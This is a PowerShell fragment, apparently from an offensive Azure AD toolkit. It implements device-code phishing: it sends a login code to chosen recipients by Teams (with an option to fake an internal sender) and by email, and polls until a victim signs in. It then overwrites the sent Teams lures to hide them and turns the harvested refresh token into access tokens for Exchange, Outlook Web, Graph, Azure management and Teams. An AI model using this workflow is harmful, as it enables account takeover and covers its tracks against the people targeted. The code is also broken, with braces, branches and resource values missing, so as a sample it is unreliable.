            "client_id" = $clientId
            "resource" =  ""

        # Invoke the request to get device and user codes
        $authResponse = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "$tenant/oauth2/devicecode?api-version=1.0" -Body $body

        Write-Host "Code: $($authResponse.user_code)"
        # Format the message
        # Send messages
        foreach($recipient in $Recipients)
                $msgDetails = Send-TeamsMessage -AccessToken $AccessToken -Recipients $recipient -Message $Message -Html -External $External -FakeInternal $FakeInternal
                Write-Host "Teams message sent to: $Recipients. ClientMessageId: $($msgDetails.ClientMessageId)"
                $msgDetails | Add-Member -NotePropertyName "Recipient" -NotePropertyValue $recipient
                $teamsMessages += $msgDetails
                Send-MailMessage -from $Sender -to $recipient -Subject $Subject -Body $message -SmtpServer $SMTPServer -BodyAsHtml -Encoding utf8
                Write-Host "Mail sent to: $recipient"

        $continue = $true
        $interval = $authResponse.interval
        $expires =  $authResponse.expires_in

        # Create body for authentication subsequent requests
            "client_id" =  $ClientId
            "grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
            "code" =       $authResponse.device_code
            "resource" =   $Resource

        # Loop while authorisation pending or until timeout exceeded
            Start-Sleep -Seconds $interval
            $total += $interval

            if($total -gt $expires)
                Write-Error "Timeout occurred"
            # Try to get the response. Will give 400 while pending so we need to try&catch
                $response = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "$Tenant/oauth2/token?api-version=1.0 " -Body $body -ErrorAction SilentlyContinue
                # This normal flow, always returns 400 unless successful
                $details=$_.ErrorDetails.Message | ConvertFrom-Json
                $continue = $details.error -eq "authorization_pending"
                Write-Verbose $details.error
                Write-Host "." -NoNewline

                    # Not pending so this is a real error
                    Write-Error $details.error_description

            # If we got response, all okay!
                Write-Host "" # new line
                break # Exit the loop

        # Dump the name
        $user = (Read-Accesstoken -AccessToken $response.access_token).upn
            $user = (Read-Accesstoken -AccessToken $response.access_token).unique_name
        Write-Host "Received access token for $user"

        # Clear the teams messages
        foreach($msg in $teamsMessages)
            Send-TeamsMessage -AccessToken $AccessToken -ClientMessageId $msg.ClientMessageId -Message $CleanMessage -Html | Out-Null

        # Save the tokens to cache
            Write-Verbose "ACCESS TOKEN: SAVE TO CACHE"
            $Script:tokens["$ClientId-"] =         $response.access_token
            $Script:refresh_tokens["$ClientId-"] = $response.refresh_token
        # Create the return hashtable
        $attributes = @{
            "AADGraph" =         $response.access_token
            "refresh_token" =    $response.refresh_token
            "EXO" =              Get-AccessTokenWithRefreshToken -Resource ""        -ClientId $clientId                              -RefreshToken $response.refresh_token -TenantId $Tenant -SaveToCache $SaveToCache
            "OWA" =              Get-AccessTokenWithRefreshToken -Resource ""           -ClientId $clientId                              -RefreshToken $response.refresh_token -TenantId $Tenant -SaveToCache $SaveToCache
            "Substrate" =        Get-AccessTokenWithRefreshToken -Resource ""         -ClientId $clientId                              -RefreshToken $response.refresh_token -TenantId $Tenant -SaveToCache $SaveToCache
            "MSGraph" =          Get-AccessTokenWithRefreshToken -Resource ""          -ClientId $clientId                              -RefreshToken $response.refresh_token -TenantId $Tenant -SaveToCache $SaveToCache
            "AZCoreManagement" = Get-AccessTokenWithRefreshToken -Resource "" -ClientId $clientId                              -RefreshToken $response.refresh_token -TenantId $Tenant -SaveToCache $SaveToCache
            "Teams" =            Get-AccessTokenWithRefreshToken -Resource ""         -ClientId "1fec8e78-bce4-4aaf-ab1b-5451cc387264" -RefreshToken $response.refresh_token -TenantId $Tenant -SaveToCache $SaveToCache

        # Return
            return New-Object psobject -Property $attributes